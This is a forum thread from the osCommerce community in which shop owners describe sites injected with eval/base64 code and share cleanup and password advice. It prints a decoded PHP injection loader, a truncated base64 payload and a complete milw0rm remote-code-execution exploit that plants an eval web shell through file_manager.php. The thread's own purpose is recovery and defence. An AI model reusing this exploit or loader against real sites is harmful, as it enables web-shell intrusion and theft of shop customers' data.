Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Did Someone hack my site ? ( Eval Base64 Decode )


Weedwaka

Recommended Posts

Thought I might add my experiences. I have been hacked 3 times in the last 6 months, each time the changes have stopped my site from loading, a dead giveaway that something is wrong. I have also had to clean a few other sites, one a joomla site that has been hacked four time in the last 12 months.

 

In every case there were four additions.

the encrypted javascript added to many pages, login, index etc

a http referencing an external script, placed in the head of many files

a new file, img.php or a variant added to all images folders

and for want of a better description a master encrypted javascript buried inside a file that appears to be selected to hide its existence

 

My experience is that every file and directory needs to be checked individually. The joomla site took four attempts to clean the first time because I tried find&replace and only manually checked the obvious, bad move. Just for reference this site has over 1000 files and the "master javascript" was buried inside a 6024 line file about two thirds of the way down. talk about going cross-eyed!

 

Never email passwords, never type passwords, use a password manager (RoboForm or such), when signing up for a new host when the email arrives containing the details, login and change the passowrd immediately. Its just a thought but if I wanted to get logins to hack I would monitor hosting providors email.

 

Keep a current backup, at least 3 deep, just in case you inadvertantly back up a hacked version.

 

graeme

Link to comment
Share on other sites

  • Replies 154
  • Created
  • Last Reply

Thought I might add my experiences. I have been hacked 3 times in the last 6 months, each time the changes have stopped my site from loading, a dead giveaway that something is wrong. I have also had to clean a few other sites, one a joomla site that has been hacked four time in the last 12 months.

 

In every case there were four additions.

the encrypted javascript added to many pages, login, index etc

a http referencing an external script, placed in the head of many files

a new file, img.php or a variant added to all images folders

and for want of a better description a master encrypted javascript buried inside a file that appears to be selected to hide its existence

 

My experience is that every file and directory needs to be checked individually. The joomla site took four attempts to clean the first time because I tried find&replace and only manually checked the obvious, bad move. Just for reference this site has over 1000 files and the "master javascript" was buried inside a 6024 line file about two thirds of the way down. talk about going cross-eyed!

 

Never email passwords, never type passwords, use a password manager (RoboForm or such), when signing up for a new host when the email arrives containing the details, login and change the passowrd immediately. Its just a thought but if I wanted to get logins to hack I would monitor hosting providors email.

 

Keep a current backup, at least 3 deep, just in case you inadvertantly back up a hacked version.

 

graeme

 

Thanks for sharing your experiences. I'm going through everything now and tried to do a batch Find and Replace but it didn't work. I then tried it on a newer version of Dreamweaver and it worked.

Link to comment
Share on other sites

I deleted the long script that was added to around 950 PHP files, uploaded the updated files, and am getting this message at the top of www.wolfftanning.com:

 

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/wolfftan/public_html/includes/functions/compatibility.php:2) in /home/wolfftan/public_html/includes/functions/sessions.php on line 102

 

Any ideas?

Link to comment
Share on other sites

Yes, your site has been hacked just like mine. You will notice that the first click on your ads will take you to another site, never the same site twice. It only happens on the first click, then you have to wait about 15 mins for it to happen again. I found it easy but hard work to get rid of it. Its not just a case of removing the code at the top of the PHP file. I found some nasty files hidden in the \admin\includes\languages\english\images\buttons folder. These files could only be seen using Filezilla using FTP. On deleting them (individually) they replicated! However I managed to delete them, you have to do them all together.

I suggest you use the program WinMerge. First take a complete copy of your site onto your hard disk. Backup the database and transfer to your PC. Scan it for viruses. Next use Win Merge to compare, folder by folder all the files (on your backup) with the virgin files from the original version of OS commerce. The files that are different will be highlighted. You can copy left or right or delete as you need taking care to account for your modifications and setups. It did not infect any files I added or were added due to modifications that are not part of the original package. However 1350 files needed cleaning and its easy to miss one or two so take your time. Then its a case of trying to lock down your scripts. I lost business for the whole of September and October due to this bug. I am still working on preventing it from happening. Rememer once you have cleaned the backup you can reload it to your site for an instant clean site.

It should not have broken anything as long as you are careful. There is anther chunk of redirection you will find in the Admin - sorry I can't recall if it was Column_Left.PHP or Configure.PHP but is has a lot of redirection to Forex india etc. I have kept the bad backup to see if I can find out who is doing this and take action against them. I think its time Google, yahoo and Microsoft got together with a team to bust these guys, I certainly would pay into some sort of scheme so the experts could track down and prosecute these people. This is my first contribution, hope its helpful its a bit long!

Link to comment
Share on other sites

Bald Eagle - Thanks for the very informative post. You're right about getting everything removed all at once. I got about 75% of the code removed last week and it seems to all have returned. I'll try the WinMerge idea but it might be a challenge (and time-consuming) since we've added so many contributions.

Link to comment
Share on other sites

Another issue we need to address is whether we're reviewing all the necessary directories for this hack. We use HostGator and have been checking the public_html folder only. Should we also be checking .cpanel, .fantasticodata, etc.? I don't think so but wanted to be absolutely certain.

Link to comment
Share on other sites

Is this a legitimate file: JsHttpRequest.php? I noticed it in Admin.

 

I also noticed a file in the same Admin folder called utils.js. Could that be a hacker file? Here's the code:

 

/**
* Subsys_JsHttpRequest_Js: JavaScript DHTML data loader.
* (C) 2005 Dmitry Koterov, http://forum.dklab.ru/users/DmitryKoterov/
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
* See http://www.gnu.org/copyleft/lesser.html
*
* Do not remove this comment if you want to use script!
* Íå óäàëÿéòå äàííûé êîììåíòàðèé, åñëè âû õîòèòå èñïîëüçîâàòü ñêðèïò!
*
* This library tries to use XMLHttpRequest (if available), and on 
* failure - use dynamically created <script> elements. Backend code
* is the same for both cases.
*
* @author Dmitry Koterov 
* @version 3.32
*/

function Subsys_JsHttpRequest_Js() { this._construct() }
(function() { // to create local-scope variables
   var COUNT       = 0;
   var PENDING     = {};
   var CACHE       = {};

   // Called by server script on data load.
   Subsys_JsHttpRequest_Js.dataReady = function(id, text, js) {
       var undef;
       var th = PENDING[id];
       delete PENDING[id];
       if (th) {
           delete th._xmlReq;
           if (th.caching) CACHE[th.hash] = [text, js];
           th._dataReady(text, js);
       } else if (typeof(th) != typeof(undef)) {
           alert("ScriptLoader: unknown pending id: "+id);
       }
   }

   Subsys_JsHttpRequest_Js.prototype = {
       // Standard properties.
       onreadystatechange: null,
       readyState:         0,
       responseText:       null,
       responseXML:        null,
       status:             200,
       statusText:         "OK",

       // Additional properties.
       session_name:       "PHPSESSID",  // set to SID cookie or GET parameter name
       responseJS:         null,         // JavaScript response array/hash
       caching:            false,        // need to use caching?

       // Internals.
       _span:              null,
       _id:                null,
       _xmlReq:            null,
       _openArg:           null,
       _reqHeaders:        null,

       dummy: function() {}, // empty function

       abort: function() {
           if (this._xmlReq) return this._xmlReq.abort();
           if (this._span) {
               this.readyState = 0;
               if (this.onreadystatechange) this.onreadystatechange();
               this._cleanupScript();
           }
       },

       open: function(method, url, asyncFlag, username, password) {
           this._openArg = {
               'method':    method,
               'url':       url,
               'asyncFlag': asyncFlag,
               'username':  username != null? username : '',
               'password':  password != null? password : ''
           };
           this._id = null;
           this._xmlReq = null;
           this._reqHeaders = [];
           return true;
       },

       send: function(content) {
           var id = (new Date().getTime()) + "" + COUNT++;

           // Build QUERY_STRING from query hash.
           var query = this._hash2query(content);

           // Append SID to original URL now.
           var url = this._openArg.url;
           var sid = this._getSid();
           if (sid) url += (url.indexOf('?')>=0? '&' : '?') + this.session_name + "=" + this.escape(sid);

           // Solve hash BEFORE appending ID.
           var hash = this.hash = url + '?' + query;
           if (this.caching && CACHE[hash]) {
               var c = CACHE[hash];
               this._dataReady(c[0], c[1]);
               return false;
           }

           // Try to use XMLHttpRequest.
           this._xmlReq = this._obtainXmlReq(id, url);

           // Pass data in URL (GET, HEAD etc.) or in request body (POST)?
           var hasSetHeader = this._xmlReq && (window.ActiveXObject || this._xmlReq.setRequestHeader); 
           var href, body;
           if (this._xmlReq && hasSetHeader && (""+this._openArg.method).toUpperCase() == "POST") {
               // Use POST method. Pass query in request body.
               // Opera 8.01 does not support setRequestHeader, so no POST method.
               this._openArg.method = "POST";
               href = url;
               body = query;
           } else {
               this._openArg.method = "GET";
               href = url + (url.indexOf('?')>=0? '&' : '?') + query;
               body = null;
           }

           // Append ID: a=aaa&b=bbb&<id>
           href = href + (href.indexOf('?')>=0? '&' : '?') + id;

           // Save loading script.
           PENDING[id] = this;

           if (this._xmlReq) {
               // Open request now & send it.
               // In XMLHttpRequest mode request URL MUST be ended with "<id>-xml".
               var a = this._openArg;
               this._xmlReq.open(a.method, href+"-xml", a.asyncFlag, a.username, a.password);
               if (hasSetHeader) {
                   // Pass pending headers.
                   for (var i=0; i<this._reqHeaders.length; i++)
                       this._xmlReq.setRequestHeader(this._reqHeaders[i][0], this._reqHeaders[i][1]);
                   // Set non-default Content-type. We cannot use 
                   // "application/x-www-form-urlencoded" here, because 
                   // in PHP variable HTTP_RAW_POST_DATA is accessible only when 
                   // enctype is not default (e.g., "application/octet-stream" 
                   // is a good start). We parse POST data manually in backend 
                   // library code.
                   this._xmlReq.setRequestHeader('Content-Type', 'application/octet-stream');
               }
               // Send the request.
               return this._xmlReq.send(body);
           } else {
               // Create <script> element and run it.
               this._obtainScript(id, href);
               return true;
           }
       },

       getAllResponseHeaders: function() {
           if (this._xmlReq) return this._xmlReq.getAllResponseHeaders();
           return '';
       },

       getResponseHeader: function(label) {
           if (this._xmlReq) return this._xmlReq.getResponseHeader(label);
           return '';
       },

       setRequestHeader: function(label, value) {
           // Collect headers.
           this._reqHeaders[this._reqHeaders.length] = [label, value];
       },


       //
       // Internal functions.
       //

       // Constructor.
       _construct: function() {},

       // Do all work when data is ready.
       _dataReady: function(text, js) { with (this) {
           if (text !== null || js !== null) {
               readyState = 4;
               responseText = responseXML = text;
               responseJS = js;
           } else {
               readyState = 0;
               responseText = responseXML = responseJS = null;
           }
           if (onreadystatechange) onreadystatechange();
           _cleanupScript();
       }},

       // Create new XMLHttpRequest object.
       _obtainXmlReq: function(id, url) {
           // If url.domain specified, cannot use XMLHttpRequest!
           // XMLHttpRequest (and MS ActiveX'es) cannot work with different domains.
           if (url.match(new RegExp('^[a-z]+://', 'i'))) return null;

           // Try to use built-in loaders.
           var req = null;
           if (window.XMLHttpRequest) {
               try { req = new XMLHttpRequest() } catch(e) {}
           } else if (window.ActiveXObject) {
               try { req = new ActiveXObject("Microsoft.XMLHTTP") } catch(e) {}
               if (!req) try { req = new ActiveXObject("Msxml2.XMLHTTP") } catch (e) {}
           }
           if (req) {
               var th = this;
               req.onreadystatechange = function() { 
                   var s = req.readyState;
                   if (s == 4) {
                       // Avoid memory leak by removing closure.
                       req.onreadystatechange = th.dummy;
                       // Remove possible junk from response.
                       var responseText = req.responseText;
                       try {
                           // Call associated dataReady().
                           eval(responseText);
                       } catch (e) {
                           Subsys_JsHttpRequest_Js.dataReady(id, "JavaScript code generated by backend is invalid!\n"+responseText, null);
                       }
                   } else {
                       th.readyState = s;
                       if (th.onreadystatechange) th.onreadystatechange() 
                   }
               };
               this._id = id;
           }
           return req;
       },

       // Create new script element and start loading.
       _obtainScript: function(id, href) { with (document) {
           var span = null;
           // Oh shit! Damned stupid fucked Opera 7.23 does not allow to create SCRIPT 
           // element over createElement (in HEAD or BODY section or in nested SPAN - 
           // no matter): it is created deadly, and does not respons on href assignment.
           // So - always create SPAN.
           span = body.appendChild(createElement("SPAN"));
           span.style.display = 'none';
           span.innerHTML = 'Text for stupid IE.<s'+'cript></' + 'script>';
           setTimeout(function() {
               var s = span.getElementsByTagName("script")[0];
               s.language = "JavaScript";
               if (s.setAttribute) s.setAttribute('src', href); else s.src = href;
           }, 10);
           this._id = id;
           this._span = span;
       }},

       // Remove last used script element (clean memory).
       _cleanupScript: function() {
           var span = this._span;
           if (span) {
               this._span = null;
               setTimeout(function() {
                   // without setTimeout - crash in IE 5.0!
                   span.parentNode.removeChild(span);
               }, 50);
           }
           return false;
       },

       // Convert hash to QUERY_STRING.
       _hash2query: function(content, prefix) {
           if (prefix == null) prefix = "";
           var query = [];
           if (content instanceof Object) {
               for (var k in content) {
                   var v = content[k];
                   if (v == null || ((v.constructor||{}).prototype||{})[k]) continue;
                   var curPrefix = prefix? prefix+'['+this.escape(k)+']' : this.escape(k);
                   if (v instanceof Object)
                       query[query.length] = this._hash2query(v, curPrefix);
                   else
                       query[query.length] = curPrefix + "=" + this.escape(v);
               }
           } else {
               query = [content];
           }
           return query.join('&');
       },

       // Return value of SID based on QUERY_STRING or cookie
       // (PHP compatible sessions).
       _getSid: function() {
           var m = document.location.search.match(new RegExp('[&?]'+this.session_name+'=([^&?]*)'));
           var sid = null;
           if (m) {
               sid = m[1];
           } else {
               var m = document.cookie.match(new RegExp('(;|^)\\s*'+this.session_name+'=([^;]*)'));
               if (m) sid = m[2];
           }
           return sid;
       },

       // Stupid JS escape() does not quote '+'.
       escape: function(s) {
           return escape(s).replace(new RegExp('\\+','g'), '%2B');
       }
   }
})();

Link to comment
Share on other sites

This is beginning to look like my diary or log. :) Anyway, I pasted the code that was added to all the PHP files into a Base64 decoder and got this:

 

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/wolfftan/public_html/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php')){include_once('/home/wolfftan/public_html/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

 

I deleted the style.css.php file that's referenced in the code and also removed the code from the top of all the PHP files. I'm not sure I've got everything and will keep a close eye on the files.

Link to comment
Share on other sites

This is beginning to look like my diary or log. :) Anyway, I pasted the code that was added to all the PHP files into a Base64 decoder and got this:

 

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/wolfftan/public_html/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php')){include_once('/home/wolfftan/public_html/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

 

I deleted the style.css.php file that's referenced in the code and also removed the code from the top of all the PHP files. I'm not sure I've got everything and will keep a close eye on the files.

 

To my experience, for osCommerce 2.x to use a .js file that calls up activex controls is not normal. Have you checked your images folders for .php files? Have you checked your database for alterations/extra tables? I personally would not trust my customers confidentiality to be safe just by "keeping a look out" for remaining files. There is no guarantee that you will have gotten everything. I would delete the site and database and restore a clean backup. I notice that alot of people neglect to make backups. People will back up their music library, their family photos, and make a Windows recovery disc, but not their commercial website. :-"

Link to comment
Share on other sites

I'm not sure exactly how they got in.. the filemanager is a pretty good guess though.. moving the admin also very good advise - will be handling that myself today.. but...

 

if they got your password they got yor password.. and they get your password with a keylogger program that installed on your PC that you got as a lovely gift when visiting an infected site - quite probably your own..

 

So now what to do.. having been involved with a group known as badwarebuster.org (formally known as stopbadware.org) I posted lots of good information on cleaning how and protecting yourself on your PC side..

 

http://www.stopbadware.org/home/security

 

 

First off either your computer.. yes your mac, might have a serious infection on it if you visited the web site while it was serving up that malicious code. I suggest you get it looked at by a professional

 

Next.. one of 2 ways they got in there to drop the code.. either the hosting server has been compromised or your password for the site has been compromised.. in either case.. from A DIFFERENT COMPUTER, go change the password ASAP. [additioanl edit -- or possibly a vulnerabilty in the software you are running on your site - osc or zencart or all those bloger applications are like candy to these hackers]

 

I've been out of this loop for a while and not sure if your mac can actually be affected by a keylogger trojen, but if it can be thats why you need to change the password from a different PC/mac. Again not mac literate here, but I highly suggest a key scrambler program to run on your mac.. try keyscrambler.com and see if they have a mac version.

 

Some hosting places will share that the server was compromised, some skate that like any pro con man..

 

It’s important you find out how they got in.. and close the door.. I closed my door Sept 2007 and not one issue since then. [additional edit -- ok so they got into my osc this week, twice.. closing that door today - but it wasnt from any keylogger issue, this is software vulnerability issues]

 

I suggest you go back in there.. FTP or SFTP and look at the file dates and compare that to your last known uploads.. this will show you how many pages they actually got into.. reload all those pages..

 

Do not comment out the code.. I suggest you remove it..

 

If you have a google webmaster tools acct, it will tell you there what pages it found malicious code on.. but of you do the compare of file dates I bet you find it yourself.. after you KNOW you are clean you can, through the google webmaster tools area, ask for a review.

Debbie D
Franklin County, VA "Moonshine Capitol of the World"
osCmax Mobile Template oscmaxtemplates.com

Link to comment
Share on other sites

hey guys,

 

Was reading this and thought I should share my experience as many of you seem to have the same hack I did and no one seems to have mentioned the type of virus you have, If in any of your images folders you have files named 'img.php', 'gifimg.php' or 'image.php' or some sort of encrypted code starting with 'eval' or 'base 64' or something similar you most likely have the gumblar virus or one of its variants. This is from personal experience and days of research and finally fixing it :).

 

The actual virus is on the PC your using the FTP from and thats why the hack keeps coming back as well as the javascript thats been added. You might clean the site up, but if you don't change your FTP password or login again from the same infected PC, your site will be infected again.

 

have a read of this http://www.danielansari.com/wordpress/2009/05/automatic-removal-of-gumblarmartuz-trojan/ and follow it, particaularly the part of using the Malware on your PC as that was the only virus scanner that picked it up! My computer already had anti-virus but it didnt pick it up and I tried 4 others and Malware was the only one that picked up the Gumblar virus.

 

Another obvvious sign of having the Gumblar virus on your PC is if some software fails to update.

 

My First post so hope this helps people.

 

Oh and once again, as soon as your site is clean, change your FTP password and install all the security modules listed earlier (i.e. IPTrap etc.) and set the correct permissions on your folders/files.

Link to comment
Share on other sites

If you belive you might have an infection on your PC you MUST change the passwords to your FTP access & admin -- FROM ANOTHER COMPUTER, not a different one in the same house or connected tot he same connection.. but from somewhere else -- this is vitally important.. you can call your hosting people and ask them to rest your passwords.. BUT -- tell them NOT to log into your website. After the password has been changed you should immediately install keyscrambler (from either www.keyscrambler.com or www.cnet.com ) and THEN you can log in and start making repairs

 

If the infection on your PC is a keylogger, you can change passwords - ftp and osc admin - every 10 minutes.. all to no avail -- the key logger logs it, transmits it to the bad guys and they update their info real time, and they are right back in there doing their direy work that you are trying so hard to clean up

Debbie D
Franklin County, VA "Moonshine Capitol of the World"
osCmax Mobile Template oscmaxtemplates.com

Link to comment
Share on other sites

  • 3 weeks later...

The "HOW" is clear now. Googeling for file_manager.php brought me to a security report for code injection into file_manager.php in osCOmmerce RC2.2a. No fix is known yet (other than renaming or deleting file_manager.php).

 

Here is the exploit:

<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: [email protected]
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='democn.51osc.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_POST[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
echo '[~]No response from'.$host;
die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>

# milw0rm.com [2009-08-31]

 

SO: DELETE OR RENAME THE FILE MANAGER!!!

 

Pipeloops,

 

Thank you kindly for your leg work in seeking out and presenting this proof of concept on the exploit. I'm sure others in the community will also find it educational. I must confess my ignorance and acknowledge that it is a bit over my head on exactly how and why it works. Once I've caught up with my other work and get a "round-toit".... Seriously though, I'll put up a test shop and try the script out.

 

Doug

Link to comment
Share on other sites

Flipping lovely.

 

I got hacked as well.. i found the various style.css.php and the little files that went along with it.. but does ANYONE know of an automated way to search and remove an entire line of code from a server??

 

I was thinking that using SSH access would work, but i am not familiar with the syntax for stuff like this. i figured out how to find and replace within an SSH session, but how do you find and DELETE within an entire directory?

 

Also, you guys should know that this is NOT JUST OSCOMMERCE.. they actually got into my website through wordpress.. LOTS of wordpress users have had this exact same hack..

 

So anyways.. no more SHOULD HAVE DONE and whos fault.. lets figure out how to fix and remove the code and how to close up the hole.

 

p.s. i had no filemanager.php file on my store.

 

 

Well I too am a sucker of this attack. Sure is a wake up call.

 

Too answer your question. If you download Notepad++ in the menu click on search, select find in files, open one of the infeced files click on the first line and copy and paste it into FIND WHAT, leave the REPLACE WITH blank, check the box to check all subfolders, then select the directory that you downloaded the catalog too. Then click on REPLACE IN FILES. DO not ckick on OK or it will stop the search. It will come back and tell you how many files it was found in and replace with nothing!

Since the FIND WHAT can only hold half of the code you will have to do this again for the second half of the code that remains but this makes for a good way to compare the number of files you just cleansed to make sure they are the same. (they will differ it you clicked the OK and had to do the serch again because you did not clense all the files the first time)

 

This takes a few minutes and you are good to go again, just go get the other couple of files manually.

 

I hope this helps someone.

 

I was going to rebuild the site again from scratch with all the security features, now I can just add the security to my fully optioned (tons of contribs) store.

The Site can be viewed at www.performanceautopartsonline.com

 

The site is live (despite these minor glitches) please respect that and do not sign up etc...

 

maybe a contribution one day when I get this site the way I want it.

 

I don't make spelling mistakes! I have dyslecsic fingers.

Link to comment
Share on other sites

  • 3 weeks later...

ok, managed to decode:

 

<?php /**/ eval(base64_decode("JGs9MTI0OyRtPWV4cGxvZGUoIjsiLCIyMTsyNjs4NDsyNjs5OzE4OzMxOzg7MjE7MTk7MTg7MzU7MjU7NDsyMTsxNTs4OzE1Ozg0OzkxOzE5OzMwOzM1OzE1Ozg7Mjk7MTQ7ODs5MTs4NTs5MDs5MDs5MzsyMTsxNTsxNTsyNTs4Ozg0Ozg4OzU5OzQ4OzUxOzYyOzYxOzQ4OzQ3OzM5OzkxOzE3OzE0OzM1OzE4OzE5OzkxOzMzOzg1Ozg1Ozc7OTI7OTI7OTI7ODg7NTk7NDg7NTE7NjI7NjE7NDg7NDc7Mzk7OTE7MTc7MTQ7MzU7MTg7MTk7OTE7MzM7NjU7Nzc7NzE7OTI7OTI7OTI7MjE7MjY7ODQ7OTM7MjY7OTsxODszMTs4OzIxOzE5OzE4OzM1OzI1OzQ7MjE7MTU7ODsxNTs4NDs5MTsxNzsxNDsxOTszMDsyMDs5MTs4NTs4NTs3OzkyOzkyOzkyOzkyOzkyOzkyOzIxOzI2Ozg0OzkzOzI2Ozk7MTg7MzE7ODsyMTsxOTsxODszNTsyNTs0OzIxOzE1Ozg7MTU7ODQ7OTE7Mjc7MTc7MTY7OTE7ODU7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5MjsyNjs5OzE4OzMxOzg7MjE7MTk7MTg7OTI7Mjc7MTc7MTY7ODQ7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs5Mjs4NDsxNTs4OzE0OzIxOzE1Ozg7MTQ7ODQ7ODg7MzU7NDc7NTc7NDY7NDI7NTc7NDY7Mzk7OTQ7NTI7NDA7NDA7NDQ7MzU7NDE7NDc7NTc7NDY7MzU7NjE7NTk7NTc7NTA7NDA7OTQ7MzM7ODA7OTQ7Mjc7MTk7MTk7Mjc7MTY7MjU7MzA7MTk7ODs5NDs4NTswOzA7MTU7ODsxNDsyMTsxNTs4OzE0Ozg0Ozg4OzM1OzQ3OzU3OzQ2OzQyOzU3OzQ2OzM5Ozk0OzUyOzQwOzQwOzQ0OzM1OzQxOzQ3OzU3OzQ2OzM1OzYxOzU5OzU3OzUwOzQwOzk0OzMzOzgwOzk0OzU7Mjk7MjA7MTk7MTk7OTQ7ODU7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsyMTsyNjs5Mjs4NDs4NDsxNzsyNDs3Mzs4NDs4ODszNTs0Njs1Nzs0NTs0MTs1Nzs0Nzs0MDszOTs5NDsxNzsxNzsxNzsyOTsyMzsxOTsxMTsxOTsyMTsxMTsxOTsxMTs3Njs3Njs3ODs5NDszMzs4NTs2NTs2NTs5NDsyOTs3OTs2OTs3OTs3MjsyNDszMDsyNTs3ODs3NjszMDs3NjszMDs3OTsyNTs2OTszMDszMDsyNTs3NTsyOTs2OTsyNTsyNjszMTszMTs3NDs3Mzs3ODs3NDsyNjs3Mjs5NDs4NTs5MDs5MDs4NDsyMTsxNTsxNTsyNTs4Ozg0Ozg4OzM1OzQ2OzU3OzQ1OzQxOzU3OzQ3OzQwOzM5Ozk0OzE3OzE3OzE3OzI5OzIzOzE5OzExOzE5OzIxOzExOzE5OzExOzc2Ozc2Ozc3Ozk0OzMzOzg1Ozg1Ozg1Ozc7ODg7NDY7Njg7NzU7Nzg7NzM7NzY7Nzg7Njk7NTc7NjE7Njg7Njk7NzU7Nzc7Nzg7NTc7NTc7NTY7Njg7NzQ7NzU7NzY7NjI7NjE7NTc7NzQ7NzI7NTY7Nzk7NzY7NTc7NzI7NzU7NjU7MzA7Mjk7MTU7MjU7NzQ7NzI7MzU7MjQ7MjU7MzE7MTk7MjQ7MjU7ODQ7ODg7MzU7NDY7NTc7NDU7NDE7NTc7NDc7NDA7Mzk7OTQ7MTc7MTc7MTc7Mjk7MjM7MTk7MTE7MTk7MjE7MTE7MTk7MTE7NzY7NzY7Nzc7OTQ7MzM7ODU7NzE7MTQ7MjU7ODs5OzE0OzE4OzkyOzk0OzU3OzQ7MjU7MzE7OTs4OzIxOzE5OzE4OzgyOzgyOzgyOzg4OzQ2OzY4Ozc1Ozc4OzczOzc2Ozc4OzY5OzU3OzYxOzY4OzY5Ozc1Ozc3Ozc4OzU3OzU3OzU2OzY4Ozc0Ozc1Ozc2OzYyOzYxOzU3Ozc0OzcyOzU2Ozc5Ozc2OzU3OzcyOzc1OzMyOzE4Ozk0OzgyOzI1OzEwOzI5OzE2Ozg0Ozg4OzQ2OzY4Ozc1Ozc4OzczOzc2Ozc4OzY5OzU3OzYxOzY4OzY5Ozc1Ozc3Ozc4OzU3OzU3OzU2OzY4Ozc0Ozc1Ozc2OzYyOzYxOzU3Ozc0OzcyOz